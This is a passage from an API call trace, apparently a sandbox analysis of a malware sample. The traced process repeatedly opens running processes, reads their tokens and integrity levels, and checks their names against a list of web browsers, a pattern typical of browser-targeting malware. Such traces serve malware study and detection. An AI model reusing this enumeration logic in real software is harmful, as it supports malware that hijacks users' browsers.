ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.933] GetLastError () returned 0x7a [0230.933] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.933] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.933] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.934] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0230.934] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0230.934] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0230.934] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0230.934] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0230.934] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0230.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0230.934] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.934] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.934] GetLastError () returned 0x7a [0230.934] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.934] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.934] CloseHandle (hObject=0x340) returned 1 [0230.935] CloseHandle (hObject=0x548) returned 1 [0230.935] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.935] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.935] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.935] GetLastError () returned 0x7a [0230.935] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.935] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.935] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.935] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0230.935] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0230.935] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0230.935] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0230.935] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0230.935] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0230.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0230.935] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.935] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.935] GetLastError () returned 0x7a [0230.936] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.936] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.936] CloseHandle (hObject=0x340) returned 1 [0230.936] CloseHandle (hObject=0x548) returned 1 [0230.936] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.936] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.936] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.936] GetLastError () returned 0x7a [0230.936] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.936] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.936] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.936] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0230.936] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0230.936] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0230.936] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0230.936] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0230.936] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0230.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0230.937] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.937] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.937] GetLastError () returned 0x7a [0230.937] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.937] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.937] CloseHandle (hObject=0x340) returned 1 [0230.937] CloseHandle (hObject=0x548) returned 1 [0230.937] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.937] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.937] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.937] GetLastError () returned 0x7a [0230.937] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.937] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.937] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.937] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0230.937] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0230.937] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0230.937] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0230.937] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0230.937] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0230.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0230.938] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.938] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.938] GetLastError () returned 0x7a [0230.938] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.938] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.938] CloseHandle (hObject=0x340) returned 1 [0230.938] CloseHandle (hObject=0x548) returned 1 [0230.938] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.938] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.938] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.938] GetLastError () returned 0x7a [0230.938] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.938] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.938] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.938] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0230.938] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0230.938] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0230.938] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0230.938] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0230.938] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0230.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0230.939] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.939] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.939] GetLastError () returned 0x7a [0230.939] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.939] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.939] CloseHandle (hObject=0x340) returned 1 [0230.939] CloseHandle (hObject=0x548) returned 1 [0230.939] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.939] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.939] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.939] GetLastError () returned 0x7a [0230.939] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.939] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.939] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.939] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0230.939] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0230.939] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0230.939] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0230.939] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0230.939] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0230.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0230.939] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.940] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.940] GetLastError () returned 0x7a [0230.940] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.940] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.940] CloseHandle (hObject=0x340) returned 1 [0230.940] CloseHandle (hObject=0x548) returned 1 [0230.940] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.940] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.940] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.940] GetLastError () returned 0x7a [0230.940] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.940] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.940] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.940] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0230.940] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0230.940] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0230.940] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0230.940] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0230.940] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0230.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0230.940] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.941] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.941] GetLastError () returned 0x7a [0230.941] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.941] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.941] CloseHandle (hObject=0x340) returned 1 [0230.941] CloseHandle (hObject=0x548) returned 1 [0230.941] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.941] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.941] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.941] GetLastError () returned 0x7a [0230.941] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.941] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.941] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.941] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0230.941] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0230.941] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0230.941] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0230.941] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0230.941] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0230.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0230.941] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.941] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.942] GetLastError () returned 0x7a [0230.942] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.942] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.942] CloseHandle (hObject=0x340) returned 1 [0230.942] CloseHandle (hObject=0x548) returned 1 [0230.942] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.942] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.942] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0230.942] GetLastError () returned 0x7a [0230.942] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0230.942] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0230.942] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0230.942] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0230.942] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0230.942] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0230.942] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0230.942] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0230.942] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0230.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0230.942] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0230.942] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0230.942] GetLastError () returned 0x7a [0230.942] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0230.942] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0230.943] CloseHandle (hObject=0x340) returned 1 [0230.943] CloseHandle (hObject=0x548) returned 1 [0230.943] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0230.943] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0230.943] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, 